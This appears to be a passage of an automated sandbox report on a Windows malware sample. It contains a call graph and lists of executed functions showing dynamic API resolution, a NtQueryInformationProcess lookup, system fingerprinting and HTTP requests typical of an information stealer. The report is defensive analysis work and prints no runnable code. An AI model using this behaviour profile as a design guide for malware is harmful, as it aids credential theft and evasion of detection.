26645->26646 26647 344a60 2 API calls 26646->26647 26648 344071 26647->26648 26649 344a60 2 API calls 26648->26649 26650 34408a 26649->26650 26651 344a60 2 API calls 26650->26651 26652 3440a0 26651->26652 26653 344a60 2 API calls 26652->26653 26654 3440b6 26653->26654 26655 344a60 2 API calls 26654->26655 26656 3440cc 26655->26656 26657 344a60 2 API calls 26656->26657 26658 3440e2 26657->26658 26659 344a60 2 API calls 26658->26659 26660 3440f8 26659->26660 26661 344a60 2 API calls 26660->26661 26662 344111 26661->26662 26663 344a60 2 API calls 26662->26663 26664 344127 26663->26664 26665 344a60 2 API calls 26664->26665 26666 34413d 26665->26666 26667 344a60 2 API calls 26666->26667 26668 344153 26667->26668 26669 344a60 2 API calls 26668->26669 26670 344169 26669->26670 26671 344a60 2 API calls 26670->26671 26672 34417f 26671->26672 26673 344a60 2 API calls 26672->26673 26674 344198 26673->26674 26675 344a60 2 API calls 26674->26675 26676 3441ae 26675->26676 26677 344a60 2 API calls 26676->26677 26678 3441c4 26677->26678 26679 344a60 2 API calls 26678->26679 26680 3441da 26679->26680 26681 344a60 2 API calls 26680->26681 26682 3441f0 26681->26682 26683 344a60 2 API calls 26682->26683 26684 344206 26683->26684 26685 344a60 2 API calls 26684->26685 26686 34421f 26685->26686 26687 344a60 2 API calls 26686->26687 26688 344235 26687->26688 26689 344a60 2 API calls 26688->26689 26690 34424b 26689->26690 26691 344a60 2 API calls 26690->26691 26692 344261 26691->26692 26693 344a60 2 API calls 26692->26693 26694 344277 26693->26694 26695 344a60 2 API calls 26694->26695 26696 34428d 26695->26696 26697 344a60 2 API calls 26696->26697 26698 3442a6 26697->26698 26699 344a60 2 API calls 26698->26699 26700 3442bc 26699->26700 26701 344a60 2 API calls 26700->26701 26702 3442d2 26701->26702 26703 344a60 2 API calls 26702->26703 26704 3442e8 26703->26704 26705 344a60 2 API calls 26704->26705 26706 3442fe 26705->26706 26707 344a60 2 API calls 26706->26707 26708 344314 26707->26708 26709 344a60 2 API calls 26708->26709 26710 34432d 26709->26710 26711 344a60 2 API calls 26710->26711 26712 344343 26711->26712 26713 344a60 2 API calls 26712->26713 26714 344359 26713->26714 26715 344a60 2 API calls 26714->26715 26716 34436f 26715->26716 26717 344a60 2 API calls 26716->26717 26718 344385 26717->26718 26719 344a60 2 API calls 26718->26719 26720 34439b 26719->26720 26721 344a60 2 API calls 26720->26721 26722 3443b4 26721->26722 26723 344a60 2 API calls 26722->26723 26724 3443ca 26723->26724 26725 344a60 2 API calls 26724->26725 26726 3443e0 26725->26726 26727 344a60 2 API calls 26726->26727 26728 3443f6 26727->26728 26729 344a60 2 API calls 26728->26729 26730 34440c 26729->26730 26731 344a60 2 API calls 26730->26731 26732 344422 26731->26732 26733 344a60 2 API calls 26732->26733 26734 34443b 26733->26734 26735 344a60 2 API calls 26734->26735 26736 344451 26735->26736 26737 344a60 2 API calls 26736->26737 26738 344467 26737->26738 26739 344a60 2 API calls 26738->26739 26740 34447d 26739->26740 26741 344a60 2 API calls 26740->26741 26742 344493 26741->26742 26743 344a60 2 API calls 26742->26743 26744 3444a9 26743->26744 26745 344a60 2 API calls 26744->26745 26746 3444c2 26745->26746 26747 344a60 2 API calls 26746->26747 26748 3444d8 26747->26748 26749 344a60 2 API calls 26748->26749 26750 3444ee 26749->26750 26751 344a60 2 API calls 26750->26751 26752 344504 26751->26752 26753 344a60 2 API calls 26752->26753 26754 34451a 26753->26754 26755 344a60 2 API calls 26754->26755 26756 344530 26755->26756 26757 344a60 2 API calls 26756->26757 26758 344549 26757->26758 26759 344a60 2 API calls 26758->26759 26760 34455f 26759->26760 26761 344a60 2 API calls 26760->26761 26762 344575 26761->26762 26763 344a60 2 API calls 26762->26763 26764 34458b 26763->26764 26765 344a60 2 API calls 26764->26765 26766 3445a1 26765->26766 26767 344a60 2 API calls 26766->26767 26768 3445b7 26767->26768 26769 344a60 2 API calls 26768->26769 26770 3445d0 26769->26770 26771 344a60 2 API calls 26770->26771 26772 3445e6 26771->26772 26773 344a60 2 API calls 26772->26773 26774 3445fc 26773->26774 26775 344a60 2 API calls 26774->26775 26776 344612 26775->26776 26777 344a60 2 API calls 26776->26777 26778 344628 26777->26778 26779 344a60 2 API calls 26778->26779 26780 34463e 26779->26780 26781 344a60 2 API calls 26780->26781 26782 344657 26781->26782 26783 344a60 2 API calls 26782->26783 26784 34466d 26783->26784 26785 344a60 2 API calls 26784->26785 26786 344683 26785->26786 26787 344a60 2 API calls 26786->26787 26788 344699 26787->26788 26789 344a60 2 API calls 26788->26789 26790 3446af 26789->26790 26791 344a60 2 API calls 26790->26791 26792 3446c5 26791->26792 26793 344a60 2 API calls 26792->26793 26794 3446de 26793->26794 26795 344a60 2 API calls 26794->26795 26796 3446f4 26795->26796 26797 344a60 2 API calls 26796->26797 26798 34470a 26797->26798 26799 344a60 2 API calls 26798->26799 26800 344720 26799->26800 26801 344a60 2 API calls 26800->26801 26802 344736 26801->26802 26803 344a60 2 API calls 26802->26803 26804 34474c 26803->26804 26805 344a60 2 API calls 26804->26805 26806 344765 26805->26806 26807 344a60 2 API calls 26806->26807 26808 34477b 26807->26808 26809 344a60 2 API calls 26808->26809 26810 344791 26809->26810 26811 344a60 2 API calls 26810->26811 26812 3447a7 26811->26812 26813 344a60 2 API calls 26812->26813 26814 3447bd 26813->26814 26815 344a60 2 API calls 26814->26815 26816 3447d3 26815->26816 26817 344a60 2 API calls 26816->26817 26818 3447ec 26817->26818 26819 344a60 2 API calls 26818->26819 26820 344802 26819->26820 26821 344a60 2 API calls 26820->26821 26822 344818 26821->26822 26823 344a60 2 API calls 26822->26823 26824 34482e 26823->26824 26825 344a60 2 API calls 26824->26825 26826 344844 26825->26826 26827 344a60 2 API calls 26826->26827 26828 34485a 26827->26828 26829 344a60 2 API calls 26828->26829 26830 344873 26829->26830 26831 344a60 2 API calls 26830->26831 26832 344889 26831->26832 26833 344a60 2 API calls 26832->26833 26834 34489f 26833->26834 26835 344a60 2 API calls 26834->26835 26836 3448b5 26835->26836 26837 344a60 2 API calls 26836->26837 26838 3448cb 26837->26838 26839 344a60 2 API calls 26838->26839 26840 3448e1 26839->26840 26841 344a60 2 API calls 26840->26841 26842 3448fa 26841->26842 26843 344a60 2 API calls 26842->26843 26844 344910 26843->26844 26845 344a60 2 API calls 26844->26845 26846 344926 26845->26846 26847 344a60 2 API calls 26846->26847 26848 34493c 26847->26848 26849 344a60 2 API calls 26848->26849 26850 344952 26849->26850 26851 344a60 2 API calls 26850->26851 26852 344968 26851->26852 26853 344a60 2 API calls 26852->26853 26854 344981 26853->26854 26855 344a60 2 API calls 26854->26855 26856 344997 26855->26856 26857 344a60 2 API calls 26856->26857 26858 3449ad 26857->26858 26859 344a60 2 API calls 26858->26859 26860 3449c3 26859->26860 26861 344a60 2 API calls 26860->26861 26862 3449d9 26861->26862 26863 344a60 2 API calls 26862->26863 26864 3449ef 26863->26864 26865 344a60 2 API calls 26864->26865 26866 344a08 26865->26866 26867 344a60 2 API calls 26866->26867 26868 344a1e 26867->26868 26869 344a60 2 API calls 26868->26869 26870 344a34 26869->26870 26871 344a60 2 API calls 26870->26871 26872 344a4a 26871->26872 26873 3666e0 26872->26873 26874 366afe 8 API calls 26873->26874 26875 3666ed 43 API calls 26873->26875 26876 366b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26874->26876 26877 366c08 26874->26877 26875->26874 26876->26877 26878 366c15 8 API calls 26877->26878 26879 366cd2 26877->26879 26878->26879 26880 366d4f 26879->26880 26881 366cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26879->26881 26882 366d5c 6 API calls 26880->26882 26883 366de9 26880->26883 26881->26880 26882->26883 26884 366df6 12 API calls 26883->26884 26885 366f10 26883->26885 26884->26885 26886 366f8d 26885->26886 26887 366f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26885->26887 26888 366f96 GetProcAddress GetProcAddress 26886->26888 26889 366fc1 26886->26889 26887->26886 26888->26889 26890 366ff5 26889->26890 26891 366fca GetProcAddress GetProcAddress 26889->26891 26892 367002 10 API calls 26890->26892 26893 3670ed 26890->26893 26891->26890 26892->26893 26894 3670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26893->26894 26895 367152 26893->26895 26894->26895 26896 36716e 26895->26896 26897 36715b GetProcAddress 26895->26897 26898 367177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26896->26898 26899 36051f 26896->26899 26897->26896 26898->26899 26900 341530 26899->26900 27209 341610 26900->27209 26902 34153b 26903 341555 lstrcpy 26902->26903 26904 34155d 26902->26904 26903->26904 26905 341577 lstrcpy 26904->26905 26906 34157f 26904->26906 26905->26906 26907 341599 lstrcpy 26906->26907 26909 3415a1 26906->26909 26907->26909 26908 341605 26911 35f1b0 lstrlen 26908->26911 26909->26908 26910 3415fd lstrcpy 26909->26910 26910->26908 26912 35f1e4 26911->26912 26913 35f1f7 lstrlen 26912->26913 26914 35f1eb lstrcpy 26912->26914 26915 35f208 26913->26915 26914->26913 26916 35f20f lstrcpy 26915->26916 26917 35f21b lstrlen 26915->26917 26916->26917 26918 35f22c 26917->26918 26919 35f233 lstrcpy 26918->26919 26920 35f23f 26918->26920 26919->26920 26921 35f258 lstrcpy 26920->26921 26922 35f264 26920->26922 26921->26922 26923 35f286 lstrcpy 26922->26923 26924 35f292 26922->26924 26923->26924 26925 35f2ba lstrcpy 26924->26925 26926 35f2c6 26924->26926 26925->26926 26927 35f2ea lstrcpy 26926->26927 26979 35f300 26926->26979 26927->26979 26928 35f30c lstrlen 26928->26979 26929 35f4b9 lstrcpy 26929->26979 26930 35f3a1 lstrcpy 26930->26979 26931 35f3c5 lstrcpy 26931->26979 26932 35f4e8 lstrcpy 26976 35f4f0 26932->26976 26933 35efb0 35 API calls 26933->26976 26934 35f479 lstrcpy 26934->26979 26935 35f59c lstrcpy 26935->26976 26936 35f70f StrCmpCA 26941 35fe8e 26936->26941 26936->26979 26937 35f616 StrCmpCA 26937->26936 26937->26976 26938 35fa29 StrCmpCA 26949 35fe2b 26938->26949 26938->26979 26939 35f73e lstrlen 26939->26979 26940 35fd4d StrCmpCA 26944 35fd60 Sleep 26940->26944 26955 35fd75 26940->26955 26942 35fead lstrlen 26941->26942 26943 35fea5 lstrcpy 26941->26943 26948 35fec7 26942->26948 26943->26942 26944->26979 26945 35fa58 lstrlen 26945->26979 26946 35f64a lstrcpy 26946->26976 26947 341530 8 API calls 26947->26976 26958 35fee7 lstrlen 26948->26958 26961 35fedf lstrcpy 26948->26961 26950 35fe4a lstrlen 26949->26950 26953 35fe42 lstrcpy 26949->26953 26957 35fe64 26950->26957 26951 35ee90 28 API calls 26951->26976 26952 35f89e lstrcpy 26952->26979 26953->26950 26954 35fd94 lstrlen 26968 35fdae 26954->26968 26955->26954 26959 35fd8c lstrcpy 26955->26959 26956 35f76f lstrcpy 26956->26979 26963 35fdce lstrlen 26957->26963 26965 35fe7c lstrcpy 26957->26965 26969 35ff01 26958->26969 26959->26954 26960 35fbb8 lstrcpy 26960->26979 26961->26958 26962 35fa89 lstrcpy 26962->26979 26981 35fde8 26963->26981 26964 35f791 lstrcpy 26964->26979 26965->26963 26967 35f8cd lstrcpy 26967->26976 26968->26963 26973 35fdc6 lstrcpy 26968->26973 26970 35ff21 26969->26970 26977 35ff19 lstrcpy 26969->26977 26978 341610 4 API calls 26970->26978 26971 35f698 lstrcpy 26971->26976 26972 35faab lstrcpy 26972->26979 26973->26963 26974 341530 8 API calls 26974->26979 26975 35fbe7 lstrcpy 26975->26976 26976->26933 26976->26935 26976->26937 26976->26938 26976->26940 26976->26946 26976->26947 26976->26951 26976->26971 26976->26979 26986 35f924 lstrcpy 26976->26986 26987 35f99e StrCmpCA 26976->26987 26989 35fc3e lstrcpy 26976->26989 26990 35fcb8 StrCmpCA 26976->26990 26991 35f9cb lstrcpy 26976->26991 26992 35fce9 lstrcpy 26976->26992 26993 35fa19 lstrcpy 26976->26993 26994 35fd3a lstrcpy 26976->26994 26977->26970 26995 35fe13 26978->26995 26979->26928 26979->26929 26979->26930 26979->26931 26979->26932 26979->26934 26979->26936 26979->26938 26979->26939 26979->26940 26979->26945 26979->26952 26979->26956 26979->26960 26979->26962 26979->26964 26979->26967 26979->26972 26979->26974 26979->26975 26979->26976 26980 35ee90 28 API calls 26979->26980 26985 35f7e2 lstrcpy 26979->26985 26988 35fafc lstrcpy 26979->26988 26980->26979 26982 35fe08 26981->26982 26983 35fe00 lstrcpy 26981->26983 26984 341610 4 API calls 26982->26984 26983->26982 26984->26995 26985->26979 26986->26976 26987->26938 26987->26976 26988->26979 26989->26976 26990->26940 26990->26976 26991->26976 26992->26976 26993->26976 26994->26976 26995->26019 26997 362785 26996->26997 26998 36278c GetVolumeInformationA 26996->26998 26997->26998 26999 3627ec GetProcessHeap RtlAllocateHeap 26998->26999 27001 362826 wsprintfA 26999->27001 27002 362822 26999->27002 27001->27002 27219 3671e0 27002->27219 27006 344c70 27005->27006 27007 344c85 27006->27007 27008 344c7d lstrcpy 27006->27008 27223 344bc0 27007->27223 27008->27007 27010 344c90 27011 344ccc lstrcpy 27010->27011 27012 344cd8 27010->27012 27011->27012 27013 344cff lstrcpy 27012->27013 27014 344d0b 27012->27014 27013->27014 27015 344d2f lstrcpy 27014->27015 27016 344d3b 27014->27016 27015->27016 27017 344d6d lstrcpy 27016->27017 27018 344d79 27016->27018 27017->27018 27019 344da0 lstrcpy 27018->27019 27020 344dac InternetOpenA StrCmpCA 27018->27020 27019->27020 27021 344de0 27020->27021 27022 3454b8 InternetCloseHandle CryptStringToBinaryA 27021->27022 27227 363e70 27021->27227 27023 3454e8 LocalAlloc 27022->27023 27039 3455d8 27022->27039 27025 3454ff CryptStringToBinaryA 27023->27025 27023->27039 27026 345517 LocalFree 27025->27026 27027 345529 lstrlen 27025->27027 27026->27039 27028 34553d 27027->27028 27030 345557 lstrcpy 27028->27030 27031 345563 lstrlen 27028->27031 27029 344dfa 27032 344e23 lstrcpy lstrcat 27029->27032 27033 344e38 27029->27033 27030->27031 27035 34557d 27031->27035 27032->27033 27034 344e5a lstrcpy 27033->27034 27037 344e62 27033->27037 27034->27037 27036 34558f lstrcpy lstrcat 27035->27036 27040 3455a2 27035->27040 27036->27040 27038 344e71 lstrlen 27037->27038 27042 344e89 27038->27042 27039->26048 27041 3455d1 27040->27041 27043 3455c9 lstrcpy 27040->27043 27041->27039 27044 344e95 lstrcpy lstrcat 27042->27044 27045 344eac 27042->27045 27043->27041 27044->27045 27046 344ed5 27045->27046 27047 344ecd lstrcpy 27045->27047 27048 344edc lstrlen 27046->27048 27047->27046 27049 344ef2 27048->27049 27050 344efe lstrcpy lstrcat 27049->27050 27051 344f15 27049->27051 27050->27051 27052 344f36 lstrcpy 27051->27052 27053 344f3e 27051->27053 27052->27053 27054 344f65 lstrcpy lstrcat 27053->27054 27055 344f7b 27053->27055 27054->27055 27056 344fa4 27055->27056 27057 344f9c lstrcpy 27055->27057 27058 344fab lstrlen 27056->27058 27057->27056 27059 344fc1 27058->27059 27060 344fcd lstrcpy lstrcat 27059->27060 27061 344fe4 27059->27061 27060->27061 27062 34500d 27061->27062 27063 345005 lstrcpy 27061->27063 27064 345014 lstrlen 27062->27064 27063->27062 27065 34502a 27064->27065 27066 345036 lstrcpy lstrcat 27065->27066 27067 34504d 27065->27067 27066->27067 27068 345079 27067->27068 27069 345071 lstrcpy 27067->27069 27070 345080 lstrlen 27068->27070 27069->27068 27071 34509b 27070->27071 27072 3450ac lstrcpy lstrcat 27071->27072 27073 3450bc 27071->27073 27072->27073 27074 3450da lstrcpy lstrcat 27073->27074 27075 3450ed 27073->27075 27074->27075 27076 34510b lstrcpy 27075->27076 27077 345113 27075->27077 27076->27077 27078 345121 InternetConnectA 27077->27078 27078->27022 27079 345150 HttpOpenRequestA 27078->27079 27080 3454b1 InternetCloseHandle 27079->27080 27081 34518b 27079->27081 27080->27022 27234 367310 lstrlen 27081->27234 27085 3451a4 27242 3672c0 27085->27242 27088 367280 lstrcpy 27089 3451c0 27088->27089 27090 367310 3 API calls 27089->27090 27091 3451d5 27090->27091 27092 367280 lstrcpy 27091->27092 27093 3451de 27092->27093 27094 367310 3 API calls 27093->27094 27095 3451f4 27094->27095 27096 367280 lstrcpy 27095->27096 27097 3451fd 27096->27097 27098 367310 3 API calls 27097->27098 27099 345213 27098->27099 27100 367280 lstrcpy 27099->27100 27101 34521c 27100->27101 27102 367310 3 API calls 27101->27102 27103 345231 27102->27103 27104 367280 lstrcpy 27103->27104 27105 34523a 27104->27105 27106 3672c0 2 API calls 27105->27106 27107 34524d 27106->27107 27108 367280 lstrcpy 27107->27108 27109 345256 27108->27109 27110 367310 3 API calls 27109->27110 27111 34526b 27110->27111 27112 367280 lstrcpy 27111->27112 27113 345274 27112->27113 27114 367310 3 API calls 27113->27114 27115 345289 27114->27115 27116 367280 lstrcpy 27115->27116 27117 345292 27116->27117 27118 3672c0 2 API calls 27117->27118 27119 3452a5 27118->27119 27120 367280 lstrcpy 27119->27120 27121 3452ae 27120->27121 27122 367310 3 API calls 27121->27122 27123 3452c3 27122->27123 27124 367280 lstrcpy 27123->27124 27125 3452cc 27124->27125 27126 367310 3 API calls 27125->27126 27127 3452e2 27126->27127 27128 367280 lstrcpy 27127->27128 27129 3452eb 27128->27129 27130 367310 3 API calls 27129->27130 27131 345301 27130->27131 27132 367280 lstrcpy 27131->27132 27133 34530a 27132->27133 27134 367310 3 API calls 27133->27134 27135 34531f 27134->27135 27136 367280 lstrcpy 27135->27136 27137 345328 27136->27137 27138 3672c0 2 API calls 27137->27138 27139 34533b 27138->27139 27140 367280 lstrcpy 27139->27140 27141 345344 27140->27141 27142 345370 lstrcpy 27141->27142 27143 34537c 27141->27143 27142->27143 27144 3672c0 2 API calls 27143->27144 27145 34538a 27144->27145 27146 3672c0 2 API calls 27145->27146 27147 345397 27146->27147 27148 367280 lstrcpy 27147->27148 27149 3453a1 27148->27149 27150 3453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27149->27150 27151 34549c InternetCloseHandle 27150->27151 27155 3453f2 27150->27155 27153 3454ae 27151->27153 27152 3453fd lstrlen 27152->27155 27153->27080 27154 34542e lstrcpy lstrcat 27154->27155 27155->27151 27155->27152 27155->27154 27156 345473 27155->27156 27157 34546b lstrcpy 27155->27157 27158 34547a InternetReadFile 27156->27158 27157->27156 27158->27151 27158->27155 27160 358cc6 ExitProcess 27159->27160 27175 358ccd 27159->27175 27161 358ee2 27161->26050 27162 358e56 StrCmpCA 27162->27175 27163 358d30 lstrlen 27163->27175 27164 358dbd StrCmpCA 27164->27175 27165 358ddd StrCmpCA 27165->27175 27166 358dfd StrCmpCA 27166->27175 27167 358e1d StrCmpCA 27167->27175 27168 358e3d StrCmpCA 27168->27175 27169 358d5a lstrlen 27169->27175 27170 358d84 StrCmpCA 27170->27175 27171 358da4 StrCmpCA 27171->27175 27172 358d06 lstrlen 27172->27175 27173 358e6f StrCmpCA 27173->27175 27174 358e88 lstrlen 27174->27175 27175->27161 27175->27162 27175->27163 27175->27164 27175->27165 27175->27166 27175->27167 27175->27168 27175->27169 27175->27170 27175->27171 27175->27172 27175->27173 27175->27174 27176 358ebb lstrcpy 27175->27176 27176->27175 27177->26056 27178->26058 27179->26064 27180->26066 27181->26072 27182->26074 27183->26080 27184->26084 27185->26090 27186->26092 27187->26096 27188->26110 27189->26114 27190->26113 27191->26109 27192->26113 27193->26132 27194->26116 27195->26117 27196->26121 27197->26124 27198->26129 27199->26136 27200->26139 27201->26145 27202->26167 27203->26171 27204->26170 27205->26166 27206->26170 27207->26180 27210 34161f 27209->27210 27211 34162b lstrcpy 27210->27211 27212 341633 27210->27212 27211->27212 27213 34164d lstrcpy 27212->27213 27214 341655 27212->27214 27213->27214 27215 34166f lstrcpy 27214->27215 27217 341677 27214->27217 27215->27217 27216 341699 27216->26902 27217->27216 27218 341691 lstrcpy 27217->27218 27218->27216 27220 3671e6 27219->27220 27221 362860 27220->27221 27222 3671fc lstrcpy 27220->27222 27221->26045 27222->27221 27224 344bd0 27223->27224 27224->27224 27225 344bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27224->27225 27226 344c41 27225->27226 27226->27010 27228 363e83 27227->27228 27229 363e9f lstrcpy 27228->27229 27230 363eab 27228->27230 27229->27230 27231 363ed5 GetSystemTime 27230->27231 27232 363ecd lstrcpy 27230->27232 27233 363ef3 27231->27233 27232->27231 27233->27029 27235 36732d 27234->27235 27236 34519b 27235->27236 27237 36733d lstrcpy lstrcat 27235->27237 27238 367280 27236->27238 27237->27236 27239 36728c 27238->27239 27240 3672b4 27239->27240 27241 3672ac lstrcpy 27239->27241 27240->27085 27241->27240 27243 3672dc 27242->27243 27244 3451b7 27243->27244 27245 3672ed lstrcpy lstrcat 27243->27245 27244->27088 27245->27244 27275 3631f0 GetSystemInfo wsprintfA 27265 35e0f9 140 API calls 27292 356b79 138 API calls 27253 348c79 strlen malloc strcpy_s 27283 35f2f8 93 API calls 27293 341b64 162 API calls 27304 34bbf9 90 API calls 27294 367310 lstrlen lstrcpy lstrcat strcpy_s 27270 362d60 11 API calls 27295 362b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27296 36a280 __CxxFrameHandler 27280 351269 408 API calls 27254 345869 57 API calls 27255 362853 lstrcpy 27266 362cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27272 353959 244 API calls 27276 3501d9 126 API calls 27298 358615 49 API calls 27267 363cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27305 3633c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27256 35e049 147 API calls 27306 358615 48 API calls

                                  Executed Functions

                                  Function 00344C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00344C7F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344CD2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D05
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D35
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D73
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 2115f1a2305295b17ddda140e39a34c68e7a997332bf722c4f9891a5920b09fb
                                  • Instruction ID: 3168acdd72e40f1191a04261b7d4c176694226b0de4f5a10084b9b07fe0803c4
                                  • Opcode Fuzzy Hash: 2115f1a2305295b17ddda140e39a34c68e7a997332bf722c4f9891a5920b09fb
                                  • Instruction Fuzzy Hash: 9A525B31D11616ABCB22EFA4DC49BAE7BF9AF04310F554424F809AF251DB34ED46DBA0
                                  Function 00366390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2125 366390-3663bd GetPEB 2126 3665c3-366623 LoadLibraryA * 5 2125->2126 2127 3663c3-3665be call 3662f0 GetProcAddress * 20 2125->2127 2129 366625-366633 GetProcAddress 2126->2129 2130 366638-36663f 2126->2130 2127->2126 2129->2130 2132 366641-366667 GetProcAddress * 2 2130->2132 2133 36666c-366673 2130->2133 2132->2133 2134 366675-366683 GetProcAddress 2133->2134 2135 366688-36668f 2133->2135 2134->2135 2136 3666a4-3666ab 2135->2136 2137 366691-36669f GetProcAddress 2135->2137 2139 3666d7-3666da 2136->2139 2140 3666ad-3666d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,00FA05B8), ref: 003663E9
                                  • GetProcAddress.KERNEL32(76F70000,00FA0750), ref: 00366402
                                  • GetProcAddress.KERNEL32(76F70000,00FA0528), ref: 0036641A
                                  • GetProcAddress.KERNEL32(76F70000,00FA05D0), ref: 00366432
                                  • GetProcAddress.KERNEL32(76F70000,00FA8AB8), ref: 0036644B
                                  • GetProcAddress.KERNEL32(76F70000,00F96220), ref: 00366463
                                  • GetProcAddress.KERNEL32(76F70000,00F96380), ref: 0036647B
                                  • GetProcAddress.KERNEL32(76F70000,00FA0768), ref: 00366494
                                  • GetProcAddress.KERNEL32(76F70000,00FA0600), ref: 003664AC
                                  • GetProcAddress.KERNEL32(76F70000,00FA0540), ref: 003664C4
                                  • GetProcAddress.KERNEL32(76F70000,00FA0618), ref: 003664DD
                                  • GetProcAddress.KERNEL32(76F70000,00F96520), ref: 003664F5
                                  • GetProcAddress.KERNEL32(76F70000,00FA0648), ref: 0036650D
                                  • GetProcAddress.KERNEL32(76F70000,00FA07B0), ref: 00366526
                                  • GetProcAddress.KERNEL32(76F70000,00F964A0), ref: 0036653E
                                  • GetProcAddress.KERNEL32(76F70000,00FA07E0), ref: 00366556
                                  • GetProcAddress.KERNEL32(76F70000,00FA08A0), ref: 0036656F
                                  • GetProcAddress.KERNEL32(76F70000,00F96540), ref: 00366587
                                  • GetProcAddress.KERNEL32(76F70000,00FA0828), ref: 0036659F
                                  • GetProcAddress.KERNEL32(76F70000,00F961E0), ref: 003665B8
                                  • LoadLibraryA.KERNEL32(00FA0888,?,?,?,00361C03), ref: 003665C9
                                  • LoadLibraryA.KERNEL32(00FA08D0,?,?,?,00361C03), ref: 003665DB
                                  • LoadLibraryA.KERNEL32(00FA08B8,?,?,?,00361C03), ref: 003665ED
                                  • LoadLibraryA.KERNEL32(00FA0840,?,?,?,00361C03), ref: 003665FE
                                  • LoadLibraryA.KERNEL32(00FA0858,?,?,?,00361C03), ref: 00366610
                                  • GetProcAddress.KERNEL32(76DA0000,00FA0810), ref: 0036662D
                                  • GetProcAddress.KERNEL32(75840000,00FA0870), ref: 00366649
                                  • GetProcAddress.KERNEL32(75840000,00FA8CD0), ref: 00366661
                                  • GetProcAddress.KERNEL32(753A0000,00FA8DD8), ref: 0036667D
                                  • GetProcAddress.KERNEL32(77300000,00F964C0), ref: 00366699
                                  • GetProcAddress.KERNEL32(774D0000,00FA8A88), ref: 003666B5
                                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 003666CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 003666C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
